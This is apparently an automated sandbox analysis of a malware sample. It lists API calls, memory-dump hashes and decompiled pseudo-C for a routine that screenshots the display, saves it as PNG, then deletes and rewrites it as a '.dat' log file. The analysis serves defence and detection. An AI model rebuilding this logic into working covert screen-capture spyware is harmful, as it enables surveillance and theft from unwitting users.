                                          • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,00415268,00415650), ref: 00403F2D
                                          • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,00415268,00415650), ref: 00403F36
                                          • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,00415268,00415650), ref: 00403F3F
                                          • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00403FC9
                                            • Part of subcall function 0040FC2C: free.MSVCRT(?,00401C53,?,?,00401C39,00000000,?,00401BE7,?,?,00401B82,?,00000000,?,?,00401B4A), ref: 0040FC30
                                            • Part of subcall function 004021C7: closesocket.WS2_32(?), ref: 004021CC
                                          • ??_D?$basic_ifstream@DU?$char_traits@D@std@@@std@@QAEXXZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00403FE9
                                            • Part of subcall function 004021D6: closesocket.WS2_32(?), ref: 004021DB
                                            • Part of subcall function 004021D6: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,00415268,00404067,?,?,?,?,?,?,?,00415268,00415650), ref: 004021E3
                                          • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,00000000,?,?,?,?,?,?,?,00415268,00415650), ref: 00403F17
                                            • Part of subcall function 00402198: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP60(?,00415A30,00415940,?,0040A446), ref: 004021A7
                                            • Part of subcall function 00402198: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 004021BA
                                          • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,00415268,00415650), ref: 0040406A
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000011.00000002.299950040.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                          Yara matches
                                          Similarity
                                          • API ID: U?$char_traits@$V?$allocator@$D@std@@$D@2@@std@@$??1?$basic_string@D@std@@@std@@$D@2@@0@Hstd@@V10@0@V?$basic_string@$??0?$basic_string@?data@?$basic_string@V12@closesocket$??0?$basic_ifstream@??2@??4?$basic_string@?c_str@?$basic_string@?close@?$basic_ifstream@?empty@?$basic_string@?is_open@?$basic_ifstream@?length@?$basic_string@?read@?$basic_istream@?seekg@?$basic_istream@?tellg@?$basic_istream@D?$basic_ifstream@D@1@@H@2@V01@V01@@V?$fpos@W4seekdir@ios_base@2@@free
                                          • String ID: autofflinelogs$offlinelogs
                                          • API String ID: 1118156792-1109209412
                                          • Opcode ID: 34a855b8f6e84a1138228eecdb917b524b66851edd165e713db23c3f32d0fa3f
                                          • Instruction ID: 7403458f184274c1abfae1a3ef7f71d8adf9ec3eca7677ca5f207d94a94b23a4
                                          • Opcode Fuzzy Hash: 34a855b8f6e84a1138228eecdb917b524b66851edd165e713db23c3f32d0fa3f
                                          • Instruction Fuzzy Hash: 5E8142729101099BCB15EBA0EC59AEE7B7CBF55304F0440BAF506B2091EF785F89CB59
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          • _EH_prolog.MSVCRT ref: 0040E15C
                                          • GdiplusStartup.GDIPLUS(00415ABC,?,00000000,00000000,00000000,00000000), ref: 0040E18F
                                          • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(0000001A), ref: 0040E1A4
                                          • ?data@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000019,00000000), ref: 0040E1B6
                                          • ??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(00000000), ref: 0040E1D3
                                          • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040E1DC
                                          • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000000), ref: 0040E1E5
                                          • CreateDirectoryA.KERNEL32(00000000), ref: 0040E1EC
                                          • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z.MSVCP60(?), ref: 0040E200
                                          • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z.MSVCP60(?), ref: 0040E20D
                                          • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP60(00000000), ref: 0040E235
                                          • Sleep.KERNEL32(000003E8), ref: 0040E251
                                          • _itoa.MSVCRT ref: 0040E273
                                          • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60(?,?,0041181C), ref: 0040E28A
                                          • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z.MSVCP60(?,00415B08,004108CC,00000000), ref: 0040E2A2
                                          • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,00000000,?,?,00000000), ref: 0040E2B2
                                          • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z.MSVCP60(?,00000000,?,?,?,?,?,00000000), ref: 0040E2C2
                                          • ??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(00000000,?,?,?,?,?,?,?,?,00000000), ref: 0040E2CE
                                          • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,00000000), ref: 0040E2DA
                                          • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,00000000), ref: 0040E2E6
                                          • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,00000000), ref: 0040E2F2
                                          • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,00000000), ref: 0040E2FB
                                          • ?data@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(0000001B,?,?,?,?,?,?,?,?,00000000), ref: 0040E30C
                                          • ?length@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60(dat,?,?,?,?,?,?,?,?,00000000), ref: 0040E31F
                                          • ?substr@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBE?AV12@II@Z.MSVCP60(?,00000000,-00000003,?,?,?,?,?,?,?,?,00000000), ref: 0040E334
                                          • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z.MSVCP60(?,00000000,?,?,?,?,?,?,?,?,00000000), ref: 0040E342
                                          • ??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(00000000,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 0040E34E
                                          • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 0040E35A
                                          • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 0040E366
                                          • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(?,?,?,?,?,?,?,?,00000000), ref: 0040E371
                                          • ??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@PBD@Z.MSVCP60(00000000,?,?,?,?,?,?,?,?,00000000), ref: 0040E37B
                                          • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(?,?,?,?,?,?,?,?,00000000), ref: 0040E384
                                          • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(?,?,?,?,?,?,?,?,00000000), ref: 0040E3A3
                                            • Part of subcall function 0040DECB: ??2@YAPAXI@Z.MSVCRT ref: 0040DEEC
                                            • Part of subcall function 0040DECB: mbstowcs.MSVCRT ref: 0040DEF8
                                            • Part of subcall function 0040DECB: LoadLibraryA.KERNEL32(Shlwapi.dll,0000000C,?,?,?,?,00000000), ref: 0040DF1B
                                            • Part of subcall function 0040DECB: GetProcAddress.KERNEL32(00000000), ref: 0040DF22
                                            • Part of subcall function 0040DECB: ?size@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60(?,?,?,?,00000000), ref: 0040DF30
                                            • Part of subcall function 0040DECB: ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000000,?,?,?,?,00000000), ref: 0040DF3A
                                            • Part of subcall function 0040DECB: ?data@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(0000001B,00000000,?,00000000,00000000,00000000,?,?,?,?,00000000), ref: 0040DF84
                                            • Part of subcall function 0040DECB: ??0?$basic_ifstream@DU?$char_traits@D@std@@@std@@QAE@PBDH@Z.MSVCP60(0040E3AF,00000024,00000001,?,?,?,?,00000000), ref: 0040DFA0
                                            • Part of subcall function 0040DECB: ?is_open@?$basic_ifstream@DU?$char_traits@D@std@@@std@@QBE_NXZ.MSVCP60(?,?,?,?,00000000), ref: 0040DFAC
                                            • Part of subcall function 0040DECB: ?tellg@?$basic_istream@DU?$char_traits@D@std@@@std@@QAE?AV?$fpos@H@2@XZ.MSVCP60(?,?,?,?,?,00000000), ref: 0040DFC4
                                            • Part of subcall function 0040DECB: ??2@YAPAXI@Z.MSVCRT ref: 0040DFDD
                                            • Part of subcall function 0040DECB: ?seekg@?$basic_istream@DU?$char_traits@D@std@@@std@@QAEAAV12@JW4seekdir@ios_base@2@@Z.MSVCP60(00000000,00000000,?,?,?,?,00000000), ref: 0040DFED
                                          • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000015), ref: 0040E3C6
                                          • atoi.MSVCRT ref: 0040E3CD
                                          • Sleep.KERNEL32(00000000), ref: 0040E3DB
                                          • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000018,?,?,?,?,?,?,?,?,00000000), ref: 0040E3ED
                                          • atoi.MSVCRT ref: 0040E3F4
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000011.00000002.299950040.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                          Yara matches
                                          Similarity
                                          • API ID: U?$char_traits@$V?$allocator@$D@std@@$D@2@@std@@$?c_str@?$basic_string@$??1?$basic_string@$??0?$basic_string@??4?$basic_string@D@2@@0@D@std@@@std@@Hstd@@V01@V01@@V?$basic_string@$?data@?$basic_string@D@1@@V10@$??2@SleepV12@atoi$??0?$basic_ifstream@?is_open@?$basic_ifstream@?length@?$basic_string@?seekg@?$basic_istream@?size@?$basic_string@?substr@?$basic_string@?tellg@?$basic_istream@AddressCreateDirectoryGdiplusH@2@H_prologLibraryLoadProcStartupV10@0@V?$fpos@W4seekdir@ios_base@2@@_itoambstowcs
                                          • String ID: .png$dat
                                          • API String ID: 1729542619-928648711
                                          • Opcode ID: 625b0a63cfc6918b55bab22c4974a16ac1eeb50d9241f62e9edcee1b060102b1
                                          • Instruction ID: 2d142cc77db60d4ea9aa91cc9091b160e98ce930e77952c3d99f5e8faa0b95a7
                                          • Opcode Fuzzy Hash: 625b0a63cfc6918b55bab22c4974a16ac1eeb50d9241f62e9edcee1b060102b1
                                          • Instruction Fuzzy Hash: 44715271900109EBCB14ABA1EC5DAEE7B7CAB44305F00847AF506B61A1DFB85E89CB59
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          • Sleep.KERNEL32(00002710), ref: 00403AFC
                                          • ??9std@@YA_NABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBD@Z.MSVCP60(?,00410668), ref: 00403B08
                                          • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60 ref: 00403B1D
                                          • GetFileAttributesA.KERNEL32(00000000), ref: 00403B24
                                          • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000080), ref: 00403B35
                                          • SetFileAttributesA.KERNEL32(00000000), ref: 00403B3C
                                          • ?data@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000012), ref: 00403B50
                                          • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(0000000A,00000001), ref: 00403B61
                                          • ??0?$basic_ofstream@DU?$char_traits@D@std@@@std@@QAE@PBDH@Z.MSVCP60(00000000), ref: 00403B6E
                                          • ?is_open@?$basic_ofstream@DU?$char_traits@D@std@@@std@@QBE_NXZ.MSVCP60 ref: 00403B7A
                                          • ??6std@@YAAAV?$basic_ostream@DU?$char_traits@D@std@@@0@AAV10@ABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@@Z.MSVCP60(?,?), ref: 00403B8C
                                          • ?close@?$basic_ofstream@DU?$char_traits@D@std@@@std@@QAEXXZ.MSVCP60 ref: 00403B99
                                          • ??_D?$basic_ofstream@DU?$char_traits@D@std@@@std@@QAEXXZ.MSVCP60 ref: 00403BA5
                                          • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z.MSVCP60(?), ref: 00403BB9
                                          • ?length@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60 ref: 00403BC6
                                          • ?data@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000000), ref: 00403BCF
                                          • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000000), ref: 00403BE3
                                            • Part of subcall function 0040F44C: ??0?$basic_ifstream@DU?$char_traits@D@std@@@std@@QAE@PBDH@Z.MSVCP60(0040E390,00000001,00000001), ref: 0040F462
                                            • Part of subcall function 0040F44C: ??Bios_base@std@@QBEPAXXZ.MSVCP60(00000000), ref: 0040F487
                                            • Part of subcall function 0040F44C: ??_D?$basic_ifstream@DU?$char_traits@D@std@@@std@@QAEXXZ.MSVCP60 ref: 0040F498
                                          • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000025,00000001), ref: 00403BFE
                                          • ??0?$basic_ifstream@DU?$char_traits@D@std@@@std@@QAE@PBDH@Z.MSVCP60(00000000), ref: 00403C0B
                                          • ?is_open@?$basic_ifstream@DU?$char_traits@D@std@@@std@@QBE_NXZ.MSVCP60 ref: 00403C17
                                          • ?tellg@?$basic_istream@DU?$char_traits@D@std@@@std@@QAE?AV?$fpos@H@2@XZ.MSVCP60(?), ref: 00403C2E
                                          • malloc.MSVCRT ref: 00403C3E
                                          • ?seekg@?$basic_istream@DU?$char_traits@D@std@@@std@@QAEAAV12@JW4seekdir@ios_base@2@@Z.MSVCP60(00000000,00000000), ref: 00403C51
                                          • ?read@?$basic_istream@DU?$char_traits@D@std@@@std@@QAEAAV12@PADH@Z.MSVCP60(00000000,00000000), ref: 00403C5F
                                          • ??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(00000000,?,00000000,00000000), ref: 00403C86
                                          • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 00403C8F
                                          • ?close@?$basic_ifstream@DU?$char_traits@D@std@@@std@@QAEXXZ.MSVCP60 ref: 00403C6B
                                            • Part of subcall function 00402A2A: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDIABV?$allocator@D@1@@Z.MSVCP60(?,?,?,00000001,?,?,?,dt@,00000000), ref: 00402A40
                                            • Part of subcall function 00402A2A: ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(?), ref: 00402A4C
                                            • Part of subcall function 00402A2A: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP60(?,00000000), ref: 00402A61
                                            • Part of subcall function 00402A2A: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 00402A6A
                                          • ??_D?$basic_ifstream@DU?$char_traits@D@std@@@std@@QAEXXZ.MSVCP60 ref: 00403C9B
                                          • ??Y?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(?), ref: 00403CAB
                                          • ?length@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60 ref: 00403CB4
                                          • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000000), ref: 00403CBE
                                          • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000032,00000001,?,00000000), ref: 00403CDA
                                          • ??0?$basic_ofstream@DU?$char_traits@D@std@@@std@@QAE@PBDH@Z.MSVCP60(00000000), ref: 00403CE7
                                          • ?is_open@?$basic_ofstream@DU?$char_traits@D@std@@@std@@QBE_NXZ.MSVCP60 ref: 00403CF3
                                          • ?length@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60 ref: 00403D00
                                          • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000000), ref: 00403D0A
                                          • ?write@?$basic_ostream@DU?$char_traits@D@std@@@std@@QAEAAV12@PBDH@Z.MSVCP60(00000000), ref: 00403D17
                                          • ?close@?$basic_ofstream@DU?$char_traits@D@std@@@std@@QAEXXZ.MSVCP60 ref: 00403D23
                                          • free.MSVCRT(00000000), ref: 00403D2A
                                          • ??_D?$basic_ofstream@DU?$char_traits@D@std@@@std@@QAEXXZ.MSVCP60 ref: 00403D37
                                          • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 00403D40
                                          • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 00403D49
                                          • ??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@PBD@Z.MSVCP60(00410668), ref: 00403D59
                                          • ?data@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000013), ref: 00403D6D
                                          • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000006), ref: 00403D7C
                                          • SetFileAttributesA.KERNEL32(00000000), ref: 00403D83
                                          Memory Dump Source
                                          • Source File: 00000011.00000002.299950040.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                          Yara matches
                                          Similarity
                                          • API ID: U?$char_traits@$V?$allocator@$D@std@@$D@2@@std@@$D@std@@@std@@$?c_str@?$basic_string@$??1?$basic_string@$??0?$basic_string@?data@?$basic_string@?length@?$basic_string@AttributesFileV01@V01@@V12@$??0?$basic_ifstream@??0?$basic_ofstream@??4?$basic_string@?close@?$basic_ofstream@?is_open@?$basic_ofstream@D?$basic_ifstream@D?$basic_ofstream@D@1@@V?$basic_string@$??6std@@??9std@@?close@?$basic_ifstream@?is_open@?$basic_ifstream@?read@?$basic_istream@?seekg@?$basic_istream@?tellg@?$basic_istream@?write@?$basic_ostream@Bios_base@std@@D@2@@0@D@2@@0@@D@std@@@0@H@2@SleepV10@V?$basic_ostream@V?$fpos@W4seekdir@ios_base@2@@Y?$basic_string@freemalloc
                                          • String ID:
                                          • API String ID: 3087783639-0
                                          • Opcode ID: 8af6aaee2c5f5c82285cf85a3cae82adee4e120e0fe4b5b0986eb998f2ebf055
                                          • Instruction ID: e0a08072a2f7578a4e0edfff01c58fb7a8cb1c357dd6a501c8ceff23d305a88f
                                          • Opcode Fuzzy Hash: 8af6aaee2c5f5c82285cf85a3cae82adee4e120e0fe4b5b0986eb998f2ebf055
                                          • Instruction Fuzzy Hash: 74711A3164011A9BCB15ABA0EC9DAEE7B39AF54305F0081B9F107A61E0DFB45EC9CF58
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          C-Code - Quality: 23%
                                          			E0040DECB(signed int __ecx, void* __edx, CHAR* _a4, char _a7) {
                                          				char _v20;
                                          				char _v36;
                                          				void _v60;
                                          				char _v76;
                                          				char _v92;
                                          				char _v108;
                                          				char _v124;
                                          				char _v132;
                                          				void* _v276;
                                          				void* _v416;
                                          				char _v1452;
                                          				long* _t50;
                                          				_Unknown_base(*)()* _t53;
                                          				char* _t61;
                                          				void* _t62;
                                          				void* _t63;
                                          				void* _t65;
                                          				int _t67;
                                          				char* _t73;
                                          				char* _t76;
                                          				signed int _t98;
                                          				int _t134;
                                          				_Unknown_base(*)()* _t141;
                                          
                                          				asm("repne scasb");
                                          				_t134 =  !(__ecx | 0xffffffff) - 1 << 1;
                                          				_t50 = _t134 + _t134;
                                          				_push(_t50);
                                          				L0040FCCC();
                                          				_t128 = _t50;
                                          				mbstowcs(_t50, _a4, _t134);
                                          				_t53 = E0040D71E( &_v36);
                                          				_t141 =  *0x415ab8; // 0x0
                                          				if(_t141 == 0) {
                                          					_t53 = GetProcAddress(LoadLibraryA("Shlwapi.dll"), 0xc);
                                          					 *0x415ab8 = _t53;
                                          				}
                                          				__imp__?size@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ();
                                          				__imp__?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ(_t53);
                                          				E0040DD42( &_v92,  *0x415ab8(_t53), 0);
                                          				E0040D999(L"image/png",  &_v108);
                                          				E0040FC2C(E0040E133( &_v108,  &_v92, _t128,  &_v108, 0), _t128);
                                          				_t61 = E00401289(0x415940, _t141, 0x1b);
                                          				__imp__?data@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ();
                                          				if( *_t61 == 1) {
                                          					__imp__??0?$basic_ifstream@DU?$char_traits@D@std@@@std@@QAE@PBDH@Z(_a4, 0x24, 1);
                                          					__imp__?is_open@?$basic_ifstream@DU?$char_traits@D@std@@@std@@QBE_NXZ();
                                          					if(_t61 != 0) {
                                          						_t63 =  &_v132;
                                          						__imp__?tellg@?$basic_istream@DU?$char_traits@D@std@@@std@@QAE?AV?$fpos@H@2@XZ(_t63);
                                          						_t98 = 6;
                                          						memcpy( &_v60, _t63, _t98 << 2);
                                          						_t65 = E00405288( &_v60);
                                          						L0040FCCC();
                                          						_t132 = _t65;
                                          						__imp__?seekg@?$basic_istream@DU?$char_traits@D@std@@@std@@QAEAAV12@JW4seekdir@ios_base@2@@Z(0, 0, _t65);
                                          						__imp__?read@?$basic_istream@DU?$char_traits@D@std@@@std@@QAEAAV12@PADH@Z(_t65, E00405288( &_v60));
                                          						__imp__?close@?$basic_ifstream@DU?$char_traits@D@std@@@std@@QAEXXZ();
                                          						_t67 = DeleteFileA(_a4);
                                          						__imp__?length@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ();
                                          						__imp__?data@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ();
                                          						E004028EB( &_v1452, _t67, _t67);
                                          						E0040FC2C(E00402A2A( &_v1452,  &_v76, _t65, E00405288( &_v60)), _t132);
                                          						_t73 =  &_a7;
                                          						__imp__??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z(_a4, _t73);
                                          						__imp__?length@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ();
                                          						__imp__?resize@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEXI@Z(_t73 - 3);
                                          						_t76 =  &_v124;
                                          						L0040FC20();
                                          						__imp__??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z(_t76, _t76,  &_v20, "dat");
                                          						__imp__??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ();
                                          						__imp__?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ(0x20, 1);
                                          						__imp__??0?$basic_ofstream@DU?$char_traits@D@std@@@std@@QAE@PBDH@Z(_t76);
                                          						_t61 = E00405288( &_v60);
                                          						__imp__?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ(_t61);
                                          						__imp__?write@?$basic_ostream@DU?$char_traits@D@std@@@std@@QAEAAV12@PBDH@Z(_t61);
                                          						__imp__?close@?$basic_ofstream@DU?$char_traits@D@std@@@std@@QAEXXZ();
                                          						__imp__??_D?$basic_ofstream@DU?$char_traits@D@std@@@std@@QAEXXZ();
                                          						__imp__??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ();
                                          						__imp__??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ();
                                          					}
                                          					__imp__??_D?$basic_ifstream@DU?$char_traits@D@std@@@std@@QAEXXZ();
                                          				}
                                          				_t62 = E0040DDA1(_t61,  &_v92);
                                          				__imp__??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ();
                                          				return _t62;
                                          			}
                                          Instruction addresses for E0040DECB (decompiler address column, one entry per source line):
                                          0x0040dedf, 0x0040dee6, 0x0040dee8, 0x0040deeb, 0x0040deec, 0x0040def2, 0x0040def8, 0x0040df02, 0x0040df0c, 0x0040df12, 0x0040df22, 0x0040df28, 0x0040df28, 0x0040df30, 0x0040df3a, 0x0040df4c, 0x0040df5a, 0x0040df70, 0x0040df7d, 0x0040df84, 0x0040df8d, 0x0040dfa0, 0x0040dfac, 0x0040dfb4, 0x0040dfba, 0x0040dfc4, 0x0040dfce, 0x0040dfd2, 0x0040dfd7, 0x0040dfdd, 0x0040dfe3, 0x0040dfed, 0x0040e003, 0x0040e00f, 0x0040e018, 0x0040e025, 0x0040e02e, 0x0040e03b, 0x0040e05a, 0x0040e060, 0x0040e06a, 0x0040e073, 0x0040e080, 0x0040e08f, 0x0040e093, 0x0040e09f, 0x0040e0a8, 0x0040e0b5, 0x0040e0c2, 0x0040e0cb, 0x0040e0d4, 0x0040e0e1, 0x0040e0ed, 0x0040e0f9, 0x0040e102, 0x0040e10b, 0x0040e10b, 0x0040e117, 0x0040e117, 0x0040e120, 0x0040e128, 0x0040e132

                                          APIs
                                          • ??2@YAPAXI@Z.MSVCRT ref: 0040DEEC
                                          • mbstowcs.MSVCRT ref: 0040DEF8
                                            • Part of subcall function 0040D71E: CreateDCA.GDI32(DISPLAY,00000000,00000000,00000000), ref: 0040D731
                                            • Part of subcall function 0040D71E: CreateCompatibleDC.GDI32(00000000), ref: 0040D73D
                                            • Part of subcall function 0040D71E: GetDeviceCaps.GDI32(00000000,00000008), ref: 0040D74F
                                            • Part of subcall function 0040D71E: GetDeviceCaps.GDI32(00000000,0000000A), ref: 0040D757
                                            • Part of subcall function 0040D71E: CreateCompatibleBitmap.GDI32(00000000,74B06490,00000000), ref: 0040D760
                                            • Part of subcall function 0040D71E: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60(00000000,?,?,00000000), ref: 0040D8B2
                                          • LoadLibraryA.KERNEL32(Shlwapi.dll,0000000C,?,?,?,?,00000000), ref: 0040DF1B
                                          • GetProcAddress.KERNEL32(00000000), ref: 0040DF22
                                          • ?size@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60(?,?,?,?,00000000), ref: 0040DF30
                                          • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000000,?,?,?,?,00000000), ref: 0040DF3A
